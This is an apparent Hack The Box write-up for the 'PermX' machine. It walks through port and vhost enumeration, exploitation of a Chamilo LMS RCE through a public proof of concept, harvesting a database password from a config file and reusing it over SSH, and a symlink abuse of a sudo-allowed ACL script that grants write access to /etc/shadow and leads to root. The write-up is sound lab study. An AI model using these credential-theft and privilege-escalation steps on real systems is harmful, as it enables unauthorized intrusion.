I’ve been messing with retired boxes on Hack the box and thought i would finally try my hand on one of the active ones!


Enumeration

So as per lets start with an nmap scan.

# Nmap 7.94SVN scan initiated Sat Jul 27 09:05:17 2024 as: nmap -sV -p- -o nmap.scan 10.10.11.23
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sat Jul 27 09:06:05 2024 -- 1 IP address (1 host up) scanned in 48.48 seconds

In doing so we find ports 22, 80 open. Both versions seem secure so lets have a look at the website.

sudo vim /etc/hosts

Adding http://permx.htb/ Looks like some elearning site. Inspecting the page source shows there is an underlying page but none of the urls load anything of interest.

/.htaccess           [33m (Status: 403)[0m [Size: 274]
/.htpasswd           [33m (Status: 403)[0m [Size: 274]
/.hta                [33m (Status: 403)[0m [Size: 274]
/css                 [36m (Status: 301)[0m [Size: 304][34m [--> <http://permx.htb/css/>][0m
/img                 [36m (Status: 301)[0m [Size: 304][34m [--> <http://permx.htb/img/>][0m
/index.html          [32m (Status: 200)[0m [Size: 36182]
/js                  [36m (Status: 301)[0m [Size: 303][34m [--> <http://permx.htb/js/>][0m
/lib                 [36m (Status: 301)[0m [Size: 304][34m [--> <http://permx.htb/lib/>][0m
/server-status       [33m (Status: 403)[0m [Size: 274]

With some further subdirectory enumeration with gobuster We have some denied and an open directory but nothing of serious interest. Lets see if we have any subdomains of interest???

Weirdly is wasn’t getting much success with with the generic ffuf method of:

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://FUZZ.permx.htb -mc 200

This doesn’t seem right. It isn’t even detecting the www root that I am connected to… After a little bit of research I found another way to make the query.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u <http://10.10.11.23> -H "Host: FUZZ.permx.htb" -mc 200

What is the difference you might ask? The former is sending out a request to DNS servers for what other subdomains it could connect to. Where the latter is sending requests directly to the IP Address im trying to hit…

And after running the command against the VHOST we get

lms.permx.htb

WHY IS IT ALWAYS DNS!!!!!!!

Lets add this bad boy to our hosts file and lets see what we got… Looks like we have a login page with the administrator mentioned at the bottom.

LoginPage

+1 to email [email protected] love you Davis Miller


Exploitation

In digging through the source to determine what version of Chamilo we are dealing with I could only determine Chamilo 1 thinking it wouldn’t get me to far without a specific version but google is a bountiful place with a simple Chamilo 1 exploit search we find a PoC put together by m3m0o m3m0o/chamilo-lms-unauthenticated-rce Thanks mate love you.

Downloading this and reviewing the exploit it can either check for the vulnerability, drop a webshell or a reverse shell using the exploit. Well I’m feeling vrevshelly today :D

ReverseShell

Looks like we are www-data but we can still read the etc/passwd looks to be a single human user of mtz that’s where our user flag will be… Lets start enumerating this box and see how we can get it.

In poking around we get this find an interesting file…

└─$ find / -type f -name "*config*" 2>/dev/null 
...
/var/www/chamilo/app/config/configuration.php
...

└─$ cat "/var/www/chamilo/app/config/configuration.php" | grep "db_user\\|db_pass"
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Great we have been able to acquire the database username and password.

Trying to login to the Chamilo portal the user doesn’t work. Good. Lets try it with the user mtz.

└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-113-generic x86_64)
...
mtz@permx:~$ cat user.txt
==============USER_FLAG_STRING==============

I’m in and we got the flag… Now to escalate to root!


Privilege Escalation

Lets start by enumerating what processes can be run as superuser.

mtz@permx:~$ find / -perm -u=s -type f 2>/dev/null
...
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

There are some interesting ones at the bottom of this lookup. Digging into polkit, we are running version 0.105-33 and with a cursery search on exploit_db we find this bad boy exploit-db

After running this a couple times however we have no success. The script is unable to create a user. Lets see what this user can run…

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

We can run acl.sh as a sudo user without a password. Looking at the script is assigns permissions to a given target file but does restrict the user to only be able to run it on their home directory. We can’t edit this file but we can abuse the security check by creating a symbolic link to root.

mtz@permx:~$ ln -s / root # Create temp symbolic link
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow # GIB SHADOW FILE PERMS
mtz@permx:~$ vim /etc/shadow 

Here we can pull the hashed root password and crack it… or we can just overwrite it with mtz password then we can su root input mtz password and BAM!!!

mtz@permx:~$ su root
Password: 
root@permx:/home/mtz# cat /root/root.txt
==============ROOT_FLAG_STRING==============

We got the root flag baby! And this rubber stamp of approval from hack the box. My smooth brain feels satisfied. I’m going to go touch some grass now :D